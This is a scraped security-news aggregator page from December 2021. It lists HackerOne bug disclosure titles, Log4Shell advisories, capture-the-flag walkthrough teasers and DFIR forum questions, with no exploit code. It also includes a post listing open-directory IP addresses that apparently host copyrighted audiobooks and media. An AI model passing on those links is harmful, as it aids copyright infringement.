    Please, refer to the post on Credential Manager if you are interested in seeing how to manage stored credentials in windows. This will be… Continue reading on System Weakness »  ( 4 min )
    HackMyVM — Twisted
    Writeup (Spanish) Continue reading on Medium »  ( 2 min )

    Hot-patch CVE-2021-44228 by exploiting the vulnerability itself
    Article URL: https://github.com/qingtengyun/cve-2021-44228-qingteng-online-patch Comments URL: https://news.ycombinator.com/item?id=29571694 Points: 1 # Comments: 0  ( 1 min )
    Exploiting and Mitigating CVE-2021-44228: Log4j Remote Code Execution (RCE)
    Article URL: https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/ Comments URL: https://news.ycombinator.com/item?id=29569587 Points: 2 # Comments: 0  ( 10 min )
    Protection against CVE-2021-45046, the additional Log4j RCE vulnerability
    Article URL: https://blog.cloudflare.com/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29568125 Points: 3 # Comments: 0
    Log4j Vulnerability (CVE-2021-44228)
    Article URL: https://github.com/NCSC-NL/log4shell Comments URL: https://news.ycombinator.com/item?id=29563247 Points: 2 # Comments: 0  ( 3 min )
    Google Chrome Zero Day CVE-2021-4102, Use after free in V8
    Article URL: https://chromereleases.googleblog.com/2021/12/stable-channel-update-for-desktop_13.html Comments URL: https://news.ycombinator.com/item?id=29561740 Points: 82 # Comments: 27  ( 6 min )

    Weak rate limit could lead to ATO due to weak password protection mechanisms
    Reddit disclosed a bug submitted by bombon: https://hackerone.com/reports/1065186 - Bounty: $100
    No rate limit on password reset leads to email enumeration at gateway-production.dubsmash.com
    Reddit disclosed a bug submitted by cracker922: https://hackerone.com/reports/1425884
    Untitled
    VK.com disclosed a bug submitted by executor: https://hackerone.com/reports/584582 - Bounty: $500
    reflected xss in e.mail.ru
    Mail.ru disclosed a bug submitted by seifelsallamy: https://hackerone.com/reports/1379297 - Bounty: $1000

    A collection of gifs
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )

    SecWiki News 2021-12-15 Review
    Full course videos for "Software Analysis" by ourren; The dilemmas and blind spots of engineering asset-risk operations, seen through the Log4Shell incident by ourren. For more of the latest articles, visit SecWiki  ( 2 min )

    Intro to Bitcoin investigation and wallet seizure - types of wallets, seeds, keys, and transactions
    submitted by /u/DFIRScience [link] [comments]  ( 1 min )

    A TL;DR technical explanation of the log4j vulnerability
    submitted by /u/sn1pr0s [link] [comments]  ( 1 min )

    [Security Advisory] Microsoft's December Patch Tuesday fixes multiple high-severity vulnerabilities
    Microsoft recently released its December security patches, fixing a total of 67 CVE vulnerabilities in Microsoft products, of which 7 are critical and 60 are high severity. They involve Windows and Windows components, ASP.NET Core and Vis...  ( 2 min )


    CISA Log4j (CVE-2021-44228) Vulnerability Guidance
    Article URL: https://github.com/cisagov/log4j-affected-db Comments URL: https://news.ycombinator.com/item?id=29559856 Points: 24 # Comments: 0  ( 2 min )
    CVE in Apache Log4j 2.15.0 was incomplete in certain non-default configurations
    Article URL: https://www.cve.org/CVERecord?id=CVE-2021-45046 Comments URL: https://news.ycombinator.com/item?id=29558106 Points: 2 # Comments: 0
    Separate Log4j DOS Vulnerability – CVE-2021-45046
    Article URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046 Comments URL: https://news.ycombinator.com/item?id=29556414 Points: 2 # Comments: 0  ( 2 min )
    CVE-2021-4102: RCE in Chromium actively being exploited
    Article URL: https://security.archlinux.org/CVE-2021-4102 Comments URL: https://news.ycombinator.com/item?id=29555514 Points: 9 # Comments: 0
    CVE-2021-45046: Apache Log4j2 2.16.0 is out
    Article URL: https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f Comments URL: https://news.ycombinator.com/item?id=29554725 Points: 10 # Comments: 1

    Windows Privilege Escalation: Scheduled Task/Job (T1573.005)
    An attacker may exploit the Windows Task Scheduler to schedule malicious programmes for initial or recurrent execution. For persistence purposes, an attacker may utilise Windows The post Windows Privilege Escalation: Scheduled Task/Job (T1573.005) appeared first on Hacking Articles.  ( 6 min )
    DarkHole: 2 Vulnhub Walkthrough
    DarkHole: 2 is a medium-hard machine created by Jihad Alqurashi for Vulnhub. This system is also put through its paces in VirtualBox. This lab is The post DarkHole: 2 Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )

    Levels of Fuzzing (2013)
    Article URL: https://blog.regehr.org/archives/1039 Comments URL: https://news.ycombinator.com/item?id=29556976 Points: 2 # Comments: 0  ( 9 min )

    Tips for DFIR Analysts, pt VI
    Context & Finding Persistence I was looking into an unusual mechanism for launching applications recently, and that research brought back a recurring issue I've seen time and again in the industry, specifically pivoting from one data point to another based on knowledge of the underlying system. Very often, during SOC monitoring or live response, we'll find a process executing via EDR telemetry (or some other means) and have no clear understanding of the mechanism that launched that process. Sometimes, we may have the data available to assist us in discovering the root cause of the process launch; for example, in the case of processes launched via web shell, all you need to do is trace backward through the process tree until you get to the web server process (i.e., w3wp.exe, etc.). Other ti…  ( 6 min )

    Any good tools for forensic analyzing a MariaDB?
    Dear community, what would you use to analyze a MariaDB forensically? I found https://github.com/pr4xx/db-forensic-framework on GitHub, but I would like to hear what you are using. Anything helps, thank you. submitted by /u/Civil-Lion-4602 [link] [comments]  ( 1 min )
    I'm currently studying to transition from a SIEM administrator to a network forensics analyst. What are good workflows/resources for analyzing PCAPs?
    Hey community, 24-year-old SIEM administrator here who's currently self-studying to become a network forensics analyst. I'm reading books, watching YouTube videos and doing some SANS and Chris Sanders courses, but I want to hear from the subreddit: what's a good workflow, or some tips, when starting to analyze PCAPs? I have a lab with Brim, Suricata, and Snort that I play with. Assuming I'm tasked with analyzing a PCAP that is related to an incident of some sort, what would be good pointers and procedures to follow? What would be things that I would want to look for, and how do I find them? Thanks in advance! submitted by /u/HeliosHype [link] [comments]  ( 2 min )
    Are books in the FAQ still relevant?
    Some of them are from 2009 to 2013. Can anyone suggest more recent books? Or are those books still the best? Also, what CTF website do you recommend that specializes in digital forensics? submitted by /u/NinjaShmurtle [link] [comments]  ( 2 min )
    Recommendations for Targeted Diff Searches
    I’m looking to cross reference forensic data dumps from two different devices. Are there any tools (preferably open source) that can compare file contents between two different folders and print matching values? submitted by /u/keeny-fn-pawers [link] [comments]  ( 1 min )

    SecWiki News 2021-12-14 Review
    A brief discussion of passive IAST products and their technical implementation by ourren. For more of the latest articles, visit SecWiki

    Gaining access to a network with Office macros — Pentesting and red teaming
    Explaining the usage of malicious Office macros to gain access to a target’s network as a red teamer. Continue reading on Medium »  ( 3 min )

    Am I getting ghosted by MITRE ?
    Hello there, I sent a request for some CVEs last week (on Thursday) to MITRE (CNA) for some bugs that I found in an open-source project; the bugs have been acknowledged by the vendor and patched. It's Tuesday today and, aside from the automated email right after the request, they haven't come back to me. Is this normal? Does it usually take that long? submitted by /u/Glum_Gur2093 [link] [comments]  ( 1 min )

    Zero day path traversal vulnerability in Grafana 8.x allows unauthenticated arbitrary local file read
    Aiven Ltd disclosed a bug submitted by j0v: https://hackerone.com/reports/1415820 - Bounty: $1000
    Universal Cross-Site Scripting vulnerability
    Proctorio disclosed a bug submitted by sector7-nl: https://hackerone.com/reports/1326264

    Audiobooks, podcasts & tutti quanti
    http://120.29.58.149:8888/Audiobooks/ http://51.198.90.160/resources/AudioBooks/ http://173.208.202.90:8080/audiobooks/Martin%2C%20George%20R.%20R.%20-%20A%20Clash%20of%20Kings http://27.32.91.221/Audiobooks/ (Movies, TV shows and music in other dirs) http://www.vicenet.org/book/Lifespan%20Why%20We%20Age%20-%20and%20Why%20We%20Don't%20Have%20To/ http://67.82.39.229:88/DandD/Audio/Chris%20Perkins%20DM/ (including D&D stuff) http://winnow.veeshanvault.org/files/Audio/ Podcasts: http://teknosophy.com/episodes/ German podcasts on OSS: http://159.69.132.234/ submitted by /u/krazybug [link] [comments]  ( 2 min )
    WikiLeaks - Can Anyone Confirm New Data Dumped Tonight?
    submitted by /u/Aphix [link] [comments]

  • Open

    [dubsmash] Username and password bruteforce
    Reddit disclosed a bug submitted by asce21: https://hackerone.com/reports/1165225 - Bounty: $100
    com.reddit.frontpage vulnerable to Task Hijacking (aka StrandHogg Attack)
    Reddit disclosed a bug submitted by nexus2k: https://hackerone.com/reports/1325649
    [dubsmash] Long String in 'shoutout' Parameter Leading to Internal Server Error on Popular Hashtags, Community and User Profile
    Reddit disclosed a bug submitted by sandeep_rj49: https://hackerone.com/reports/1237428 - Bounty: $1000
    No Rate limit on change password leads to account takeover
    Reddit disclosed a bug submitted by dreamispossible: https://hackerone.com/reports/1165285
    Vulnerabilities in exported activity WebView
    Shipt disclosed a bug submitted by shell_c0de: https://hackerone.com/reports/414101 - Bounty: $350
    Error Page Content Spoofing or Text Injection
    Judge.me disclosed a bug submitted by tefa_: https://hackerone.com/reports/1421413
  • Open

    Through the years..Movies,TV, Software, etc...
    submitted by /u/Yankeeslv [link] [comments]  ( 1 min )
    Christmas movies and other Christmas stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    The first list contains mostly PDF and EPUB files. The second is a list of questionable/unexplored/interesting directories.
    Plus an appreciation repost for this post about Calishot and the terabytes of data being hosted. Adding NSFW flare for the unexplored directories, and for the nature of https://ihatefeds.com 's content. submitted by /u/Ok_Strawberry7053 [link] [comments]
  • Open

    Seal HackTheBox Walkthrough
    Seal is a CTF Linux machine rated as medium difficulty on the Hack the Box platform. So let's get started and deep dive into breaking down The post Seal HackTheBox Walkthrough appeared first on Hacking Articles.  ( 7 min )
  • Open

    Imaging Software
    What freeware beside Paladin do you use for imaging after booting? Any suggestions? submitted by /u/Civil_Structure_1033 [link] [comments]  ( 1 min )
    Diavol Ransomware
    submitted by /u/TheDFIRReport [link] [comments]  ( 1 min )
  • Open

    Why Log4Shell could be the worst software vulnerability ever
    Thousands of Java applications across the world are wide open to remote code execution attacks targeting the Log4j library. This post summarizes what we know so far about the Log4Shell vulnerability, how you can mitigate it, how to find it using Netsparker, and what it means for cybersecurity here and now. READ MORE  ( 5 min )
  • Open

    Finding the log4j RCE With Fuzzing
    Article URL: https://www.code-intelligence.com/blog/java-fuzzing-log4j-rce Comments URL: https://news.ycombinator.com/item?id=29541779 Points: 1 # Comments: 1  ( 1 min )
  • Open

    SecWiki News 2021-12-13 Review
    SecWiki Weekly (Issue 406) by ourren; Looking at the in-the-wild spread of Log4Shell through a cryptomining trojan case by Avenger. For more of the latest articles, visit SecWiki
  • Open

    [Security Advisory] Apache Log4j2 Remote Code Execution Vulnerability
    Recently, an Apache Log4j2 remote code execution vulnerability has appeared on the internet. An attacker can exploit this vulnerability by constructing a specially crafted data request packet, ultimately triggering remote code execution. Because the scope of this vulnerability is extremely broad, it is recommended that all users...  ( 4 min )
  • Open

    Can we find Log4Shell with Java Fuzzing? 🔥 (CVE-2021-44228 - Log4j RCE)
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Monitoring events through the OSINT system to ensure the information security of the organization
    Today OSINT (Open Source Intelligence) term is used in different aspects. Continue reading on Medium »  ( 5 min )
  • Open

    Fuzzing Wasabi RPC
    Using Burp Suite Continue reading on Coinmonks »  ( 2 min )
    Fuzzing Wasabi RPC
    Using Burp Suite Continue reading on Medium »  ( 2 min )
  • Open

    How to Mint and Trade Your NFTs with X.XYZ
    x.xyz is an NFT trading platform with almost zero gas fees; X runs on the Fantom network, so Continue reading on Medium »  ( 2 min )

  • Open

    Self-Hosted Interactsh for Private OOB Testing
    This weekend the internet is really on fire because of log4shell. Now security staff will be responding to it and scanning their assets, and while OOB (Out-Of-Band), the most common identification method used here, can be tested conveniently with well-known services (ZAP OAST, Burp Suite Collaborator, Interactsh, etc.), this ultimately leaves the IP of the server on which the callback occurred with an external party, creating a point where the company or group operating that service can obtain information. (Not a great picture.) So today I want to talk about how to set up and use a separate interactsh server, using a VPC and DNS glue records, so that OOB can be tested privately.
  • Open

    HackMyVM — Furious
    Writeup (Spanish) Continue reading on Medium »  ( 3 min )
  • Open

    Finding a deleted file without having a file name
    tldr; need to find a file that may or may not have been on 3 separate Windows PCs. The only definitive info I have is the file itself, which is a PDF of a scanned document. The file was deleted in 2019 and removed from the recycle bin. Hey all, not sure where to start here, hoping someone can point me in the right direction. I've got a PDF file of a scanned document. That is all I know about the file. Not sure if the name would have been changed, if it was originally a .docx, nothing. My first question is how to find it if it isn't deleted? I opened it up in Notepad, grabbed a unique string from the file and then searched using 'Everything' (voidtools), but it was hit or miss as to whether it found it. 2nd question is how to find it if it was deleted. The file dates back to 2019 and these computers are used on a daily basis, so I'm not very hopeful the data wouldn't have been overwritten by now. Thanks in advance submitted by /u/mat7688 [link] [comments]  ( 2 min )
    Biggest dreams in the field?
    Something a little different. What do you hope to accomplish in your career? Opening up your own firm? New research? I am just curious. submitted by /u/FAlady [link] [comments]  ( 1 min )
    Mobile phone and MacOS forensic tools
    I’m going to be attending SANS DFIR NetWars and I’m confident everywhere except smartphones and macOS. I know we’ll be given Apple HFS/APFS and iOS and Android acquisitions, which I’m not sure how to even approach. So I was wondering if anybody had some good resources on how to tackle them submitted by /u/KennethsFreq [link] [comments]  ( 1 min )
  • Open

    A galore of animated movies, series and anime to prepare your Christmas time in family
    submitted by /u/krazybug [link] [comments]  ( 4 min )
  • Open

    Exploit samAccountName spoofing with Kerberos
    submitted by /u/dmchell [link] [comments]
  • Open

    add class vulnerable Stored XSS
    Mail.ru disclosed a bug submitted by mrirfan__07: https://hackerone.com/reports/1215179

  • Open

    Chronos Vulnhub Walkthrough
    Chronos is an easy/medium machine from Vulnhub by AL1ENUM. This machine is also tested in VirtualBox. This lab is suitable for novices because it has The post Chronos Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    RXSS - http://macademy.mtnonline.com
    MTN Group disclosed a bug submitted by 0xelkomy: https://hackerone.com/reports/1091165
    Missing captcha and rate limit protection in help form
    MTN Group disclosed a bug submitted by aliyugombe: https://hackerone.com/reports/1165223
    [BrakTooth] Bluetooth vulnerability allows attacker to disconnect or deny reconnection to BT devices connected to a target. Attack #1
    Intel Corporation disclosed a bug submitted by matheus_garbelini: https://hackerone.com/reports/1397601 - Bounty: $3000
    [BrakTooth] Bluetooth vulnerability allows attacker to disconnect or deny reconnection to BT devices connected to a target. Attack #2
    Intel Corporation disclosed a bug submitted by matheus_garbelini: https://hackerone.com/reports/1397602 - Bounty: $3000
  • Open

    Log4shell: the whole world's internet is on fire 🔥 (CVE-2021-44228/CVE-2021-45046/CVE-2021-45105)
    Yes, just yesterday (2021-12-10) an RCE 0-day vulnerability was disclosed in log4j2, Java's logging package. As long as a service or application can write logs at all, there is a possibility of attack in any environment, and since the risk is RCE, the whole world really is on fire. (Haha, my DMs are blowing up too. I'm not going to look at them……) Work comes first, so yesterday I focused on response and am sharing this as a post one day late. Wait… actually it isn't over yet… There were additional items to respond to afterwards, CVE-2021-45046 and CVE-2021-45105, so it feels like I spent from Friday, the initial disclosure, through the following week in a frenzy. Anyway, my respects to every security engineer, developer, DevOps and everyone else who suffered through this incident 👏🏼
    Browser Addons for Web Hackers
    Do you use a lot of web browser addons during security testing? At one time I installed and used a huge number of them, but now I seem to keep it under five. Today I'd like to introduce addons that are useful for security testing and share how my usage has changed over time. TLDR Name Firefox Chrome 😎 Darkreader Firefox Addons Chrome store 🎩 Eval Villian Firefox Addons, Github 🖥 postMessage-tracker Github 🍪 Cookie-quick-manager Firefox Addons, Github 🍪 Edit-This-Cookie Chrome store, Github 🗑 Clear cache Firefox Addons, Github Chrome store 👩🏽‍💻 JWT Debugger (Github) Firefox Addons Chrome store Changes I used to use a lot of browser addons in the past.

  • Open

    Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228) (Updated Dec. 28)
    We provide background and a root cause analysis of CVE-2021-44228, a remote code execution vulnerability in Apache log4j, and we recommend mitigations. The post Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228) (Updated Dec. 28) appeared first on Unit42.
  • Open

    Five fundamental tips for getting executive buy-in on AppSec
    Demonstrating AppSec value to executives can be an uphill battle. This post shows how, with the right metrics and planning, getting C-suite buy-in for application security can become much easier. READ MORE  ( 5 min )
  • Open

    Quick Guide: Go 1.18 Features
    With the Go 1.18 version, which is planned to be released in the first quarter of 2022, many new features are waiting for us. Continue reading on Medium »  ( 4 min )
    What's Coming with Go 1.18?
    Many new features await us with the Go 1.18 version, planned for release in the first quarter of 2022. Continue reading on Medium »  ( 2 min )
  • Open

    Trivial RCE in log4j
    submitted by /u/dfv157 [link] [comments]
    Evasion Adventures
    submitted by /u/grandstream [link] [comments]
  • Open

    Looking for career advice
    Please remove this if it doesn't fit in with this sub, I'm asking here because this seems to be the most common place to discuss appsec. A little about myself: I'm currently working in a helpdesk role in Australia and have been practicing both offensive netsec and web application security/exploit dev for a little while. I like both netsec and appsec but netsec bores me a little bit and I really enjoy coding/learning about applications and exploiting them. The issue I'm having is that helpdesk work seems to line up nicely with network pentesting, and I don't have a degree or any development experience. But with that said I'd really enjoy doing application security as a career. Does anyone have any advice in regards to entering the application security world from a support role? Or would it be better for me to pursue network security and then try to switch to application security later? Also should I pursue any certs that might help? I've thought about OSWE in the future. Any advice would be great, and again if this post doesn't belong here I can delete. Thanks. submitted by /u/n3v327311 [link] [comments]  ( 2 min )

  • Open

    Endpoint without access control leads to order information and status changes
    Azbuka Vkusa disclosed a bug submitted by cabelo: https://hackerone.com/reports/1050753 - Bounty: $1000
    Misconfiguration Certificate Authority Authorization Rule
    Sifchain disclosed a bug submitted by d4rk_r0s3: https://hackerone.com/reports/1186740
    Linux Desktop application "sifnoded" executable does not use Pie / no ASLR
    Sifchain disclosed a bug submitted by n33dm0n3y: https://hackerone.com/reports/1188633
    CORS (Cross-Origin Resource Sharing) origin validation failure
    Sifchain disclosed a bug submitted by 11holefinder: https://hackerone.com/reports/1192147
    Vulnerability : Email Spoofing
    Sifchain disclosed a bug submitted by tajammul: https://hackerone.com/reports/1180668
    No valid SPF record found
    Sifchain disclosed a bug submitted by tamilarasi11: https://hackerone.com/reports/1187001
    Username disclosure at Main Domain
    Sifchain disclosed a bug submitted by n33dm0n3y: https://hackerone.com/reports/1188662
    Design Issues at Main Domain
    Sifchain disclosed a bug submitted by n33dm0n3y: https://hackerone.com/reports/1188652
    No Rate Limit in email leads to huge Mass mailings
    Sifchain disclosed a bug submitted by sudhakarsurya: https://hackerone.com/reports/1185903
    Information Disclosure at one of your subdomain
    Sifchain disclosed a bug submitted by omemishra: https://hackerone.com/reports/1195423
    Sifchain Privacy Policy Webpage Uses Wordpress Default Template. Does Not Display Correct Privacy Policy.
    Sifchain disclosed a bug submitted by masq31: https://hackerone.com/reports/1196049
    Clickjacking /framing on sensitive Subdomain
    Sifchain disclosed a bug submitted by ilxax1: https://hackerone.com/reports/1195209
    No Valid SPF Records at sifchain.finance
    Sifchain disclosed a bug submitted by n33dm0n3y: https://hackerone.com/reports/1188725
    Session Token in URL
    Sifchain disclosed a bug submitted by little_one: https://hackerone.com/reports/1197078
    CSRF in newsletter form
    Sifchain disclosed a bug submitted by ph0b0s: https://hackerone.com/reports/1190705
    Wrong Implementation of Url in https://docs.sifchain.finance/
    Sifchain disclosed a bug submitted by sar00n: https://hackerone.com/reports/1198877
    Wrong Url in Main page of sifchain.finance
    Sifchain disclosed a bug submitted by beebeek: https://hackerone.com/reports/1195512
    Clickjacking at sifchain.finance
    Sifchain disclosed a bug submitted by manjithgowthaman: https://hackerone.com/reports/1212595
    clickjacking vulnerability
    Sifchain disclosed a bug submitted by sravani_1234: https://hackerone.com/reports/1199904
    Clickjacking
    Sifchain disclosed a bug submitted by v_t: https://hackerone.com/reports/1206138
    information disclosure
    Sifchain disclosed a bug submitted by virus26: https://hackerone.com/reports/1218784
    Possible Database Details stored in values.yaml
    Sifchain disclosed a bug submitted by sparta5537: https://hackerone.com/reports/1199803
    Sifchain token leak
    Sifchain disclosed a bug submitted by abdullah321: https://hackerone.com/reports/1188938
    ETHEREUM_PRIVATE_KEY leaked via github
    Sifchain disclosed a bug submitted by bugkillerak: https://hackerone.com/reports/1283605
    4 xss vulnerability dom based cwe 79 ; wordpress bootstrap.min.js is vulnerable
    Sifchain disclosed a bug submitted by rao_ji1hackerone: https://hackerone.com/reports/1219002
    Signature Verification /// golang.org/x/crypto/ssh
    Sifchain disclosed a bug submitted by dpredrag: https://hackerone.com/reports/1276384
    Origin IP Disclosure Vulnerability
    Sifchain disclosed a bug submitted by uniquekamboj6738: https://hackerone.com/reports/1327443
    Dependency Confusion Vulnerability in Sifnode Due to Unclaimed npm Packages.
    Sifchain disclosed a bug submitted by 0xcachefl0w: https://hackerone.com/reports/1187816
    Email Spoofing bug
    Sifchain disclosed a bug submitted by niloychowdhury3: https://hackerone.com/reports/1176090
    [34.96.80.155] Server Logs Disclosure lead to Information Leakage
    Evernote disclosed a bug submitted by huntinex: https://hackerone.com/reports/1398270 - Bounty: $150
    Exposed kubernetes dashboard
    8x8 disclosed a bug submitted by bugkill3r: https://hackerone.com/reports/1418101
  • Open

    Chrome on Windows performance improvements and the journey of Native Window Occlusion
    Whether you prefer organizing your browser with tab groups, naming your windows, tab search, or another method, you have lots of features that help you get to the tabs you want. In this The Fast and the Curious post, we describe how we use what windows are visible to you to optimize Chrome, leading to 25.8% faster start up and 4.5% fewer crashes. Background For several years, to improve the user experience, Chrome has lowered the priority of background tabs[1]. For example, JavaScript is throttled in background tabs, and these tabs don’t render web content. This reduces CPU, GPU and memory usage, which leaves more memory, CPU and GPU for foreground tabs that the user actually sees. However, the logic was limited to tabs that weren't focused in their window, or windows that were minimiz…
  • Open

    Detecting Patient Zero Web Threats in Real Time With Advanced URL Filtering
    Patient zero web threats are malicious URLs that are being seen for the first time. We discuss how to stop them despite attacker cloaking techniques. The post Detecting Patient Zero Web Threats in Real Time With Advanced URL Filtering appeared first on Unit42.

  • Open

    State of the Subreddit #3
    Greetings everyone in r/asknetsec, I hope everyone is doing well and getting ready for the holidays. All the moderators here wish you a relaxing and safe time with your families and friends. Hopefully we all will get a breather from the crazy world of Cyber Security and Networking. A couple of updates right off the bat – We’ve noticed an uptick in traffic for the subreddit over the past couple of months. Page views are up roughly 35% since the all-time lows of June-July when the subreddit was locked from the original admin. We are very happy with the increase, as it allows more collaboration and questions to be answered. Survey requests are no longer accepted on the subreddit going forward. We had a bit of a conversation internally on this topic as they seem to come up once or twice a week. Usually these are from college students requesting information for a class or study. We wish to continue and help anyone in school to best of our ability, but most of the time these surveys results are not shared publicly, and only benefit the survey creator. Due to this we don’t see it beneficial to include them. We’ve added surveys to rule 2 of what is relevant to the subreddit. Going into the new year, we hope to start providing everyone with some AMAs from verified industry professionals. We’ve been talking about this internally for a bit. State of the subreddit posts will most likely continue once every quarter (3 months). Thanks to everyone for continuing to contribute to the subreddit and continuing to report posts that break the rules. Even if you are unsure, your reports are appreciated. Have a fantastic holiday, and if you need anything, don’t hesitate to reach out to us directly. -AskNetSec Mod Team submitted by /u/Envyforme [link] [comments]  ( 1 min )
  • Open

    Process Ghosting - EDR Evasion
    submitted by /u/netbiosX [link] [comments]  ( 1 min )
    FIN13: A Cybercriminal Threat Actor Focused on Mexico
    submitted by /u/dmchell [link] [comments]
    Multiple Vulnerabilities in AWS and Other Major Cloud Services
    submitted by /u/GHIDRAdev [link] [comments]
  • Open

    [Transportation Management Services Solution 2.0] Improper authorization at tmss.gsa.gov leads to data exposure of all registered users
    U.S. General Services Administration disclosed a bug submitted by alexandrio: https://hackerone.com/reports/1175980
    php info file and sql backup at vendor's subdomain
    Semrush disclosed a bug submitted by rivalsec: https://hackerone.com/reports/1358249 - Bounty: $200
    Account Takeover through registration to the same email address
    QIWI disclosed a bug submitted by avolume: https://hackerone.com/reports/1224008 - Bounty: $100
    [allods.mail.ru] - WebCache Poisoning Host Header lead to Potential Stored XSS
    Mail.ru disclosed a bug submitted by 0xd0ff9: https://hackerone.com/reports/1262408

  • Open

    Explore Hackthebox Walkthrough
    “Explore” is a Capture the Flag challenge that we’ll be solving today. (HTB) Hack the Box is where you can get your hands on one, The post Explore Hackthebox Walkthrough appeared first on Hacking Articles.  ( 4 min )
  • Open

    CORS origin validation failure
    UPchieve disclosed a bug submitted by jupiter-47: https://hackerone.com/reports/1404986
    Authentication Bypass - Email Verification code bypass in account registration process.
    UPchieve disclosed a bug submitted by anas_44: https://hackerone.com/reports/1406471
    Bypass a fix for report #708013
    Shopify disclosed a bug submitted by scaramouche31: https://hackerone.com/reports/1363672 - Bounty: $3500
    Guard WKS lookup: Evil WKS server forces connections to last forever
    Open-Xchange disclosed a bug submitted by afewgoats: https://hackerone.com/reports/1016691 - Bounty: $444
    Blind XSS
    Rocket.Chat disclosed a bug submitted by cyberasset: https://hackerone.com/reports/1091118
  • Open

    [Security Advisory] Grafana Unauthenticated Arbitrary File Read 0day Vulnerability
    Recently, a Grafana unauthenticated arbitrary file read 0day vulnerability has appeared on the internet; the vulnerability details have not yet been made public. An attacker can use this vulnerability to read arbitrary files on the host without authentication.  ( 1 min )
  • Open

    WHY fuzzers MISSED this buffer-overflow in Mozilla NSS library? 🤦‍♂️ (CVE-2021-43527 explained)
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    NICKEL targeting government organizations across Latin America and Europe - Microsoft Security Blog
    submitted by /u/dmchell [link] [comments]
    Suspected Russian Activity Targeting Government and Business Entities Around the Globe
    submitted by /u/dmchell [link] [comments]
  • Open

    Introduction to GraphQL API security
    GraphQL is a data query and manipulation language for building APIs that is quickly gaining popularity. While it comes with built-in validation and type-checking, it also has its share of security shortcomings that attackers can exploit to access sensitive data. READ MORE  ( 6 min )

  • Open

    Full read SSRF in www.evernote.com that can leak aws metadata and local file inclusion
    Evernote disclosed a bug submitted by neolexsecurity: https://hackerone.com/reports/1189367 - Bounty: $5000
    IDOR to view order information of users and personal information
    Affirm disclosed a bug submitted by xfiltrer: https://hackerone.com/reports/1323406 - Bounty: $500
    xss is triggered on your web
    Shopify disclosed a bug submitted by jaka_tingkir: https://hackerone.com/reports/1121900 - Bounty: $2900
    [h1-2102] Wholesale - CSRF to Generate Invitation Token for a Customer and Move Customer to Invited Status
    Shopify disclosed a bug submitted by rhynorater: https://hackerone.com/reports/1091209 - Bounty: $500
  • Open

    Detection and Response for Linux Reflective Code Loading Malware— This is How
    submitted by /u/elixirelixir [link] [comments]
    Reflective Code Loading in Linux — A New Defense Evasion Technique in MITRE ATT&CK v10
    submitted by /u/elixirelixir [link] [comments]
  • Open

    How is timeless debugging ( reverse debugging ) good? Insight needed
    Any statistical data would be really appreciated. Thanks in advance. submitted by /u/h3ll0-fr13nd [link] [comments]  ( 1 min )
  • Open

    Controlling the ZAP Root CA via the API and CLI Arguments
    A new addon has been added to ZAP. With this addon, ZAP's certificate, that is, its Root CA, can be controlled via the API or the CLI. Using it makes certificate handling a bit easier when running in daemon mode or in a CI/CD pipeline. Today let's look at the Network addon, which lets you handle ZAP's Root CA, i.e. its certificate, easily through API/CLI arguments, and how it works 🚀 Network addon The Network addon is not an addon with special functionality; it is an addon added to support ZAP's certificate handling.

  • Open

    [Translation] Facebook Traffic Routing Best Practices: Full-Path XDP/BPF Infrastructure from Public Ingress to Internal Services (LPC, 2021)
    Translator's preface: This article is a translation of a Facebook talk at LPC 2021: From XDP to Socket: Routing of packets beyond XDP with BPF. The title can be rendered literally as "Full-path traffic routing from XDP to Socket: where XDP falls short, BPF fills in", because XDP runs on the NIC, at the edge and traffic ingress, and cannot reach the path beyond that (especially once packets enter the kernel protocol stack), so other BPF techniques are introduced to "relay" the routing process. Also, "routing" here is not router-style L3 routing in the narrow sense but refers generally to L3-L7 traffic forwarding. Some links and code snippets were added during translation to make it easier to understand. Due to the translator's limited ability, this article may contain omissions or errors. If in doubt, please consult the original. The translation follows. Translator's preface 1 Introduction 1.1 Prior work 1.2 Facebook traffic infrastructure 1.3 Challenges 2 Choosing a backend host: consistency and stateless routing of intra-datacenter traffic (L4 load balancing) 2.1 Katran (L4LB) load balancing mechanism 2.2 Limitations of consistent hashing 2.2.1 Fault tolerance: disruption of unrelated connections by backend failures 2.2.2 Problems facing long-lived TCP connections 2.2.3 Why the QUIC protocol is unaffected: connection_id, fully stateless L4 routing 2.3 TCP connection solution: using BPF to embed backend server information in the TCP header 2.3.1 Principle and flow 2.3.2 Overhead: data overhead: TCP header grows by 6 bytes; runtime overhead: not noticeable 2.3.3 Implementation details: socket events listened for; maintaining the TCP flow -> server_id mapping; server_id allocation and synchronization 2.3.4 Results 2.3.5…

  • Open

    Invoke-PSImage PowerShell Class Project
    A partner and I are in charge of creating a class exercise to show examples of steganography and potential malware. With some research, we discovered Invoke-PSImage on GitHub (GitHub Link). We want to just show how to first input a secret message via steganography with PowerShell and then show how you can input "safe" malware like opening a youtube link from opening the image. So far it isn't working and online tutorials haven't been much help. Does anyone have any experience with this module or know of any other tools that we could use? It is also due tonight 😂 submitted by /u/zacattac1 [link] [comments]  ( 1 min )
  • Open

    Recaptcha Secret key Leaked
    Paragon Initiative Enterprises disclosed a bug submitted by kashifinfo90: https://hackerone.com/reports/1416665
    Authenticated kubernetes principal with restricted permissions can retrieve ingress-nginx serviceaccount token and secrets across all namespaces
    Kubernetes disclosed a bug submitted by libio: https://hackerone.com/reports/1249583 - Bounty: $2500
    Staff can use BULK_OPERATIONS_FINISH webhook topic using Graphql without permissions all
    Shopify disclosed a bug submitted by yinvi777: https://hackerone.com/reports/1350095 - Bounty: $600
  • Open

    TryHackMe | Beginner | Advent of Cyber 3 (2021) | Web Exploitation | Fuzzing in Burp Suite |…
    Today we will understand how to Fuzz using Burp Suite. On Day 3, we had used dirbuster for the same purpose. Continue reading on Medium »  ( 2 min )

  • Open

    reflected xss on the path m.tiktok.com
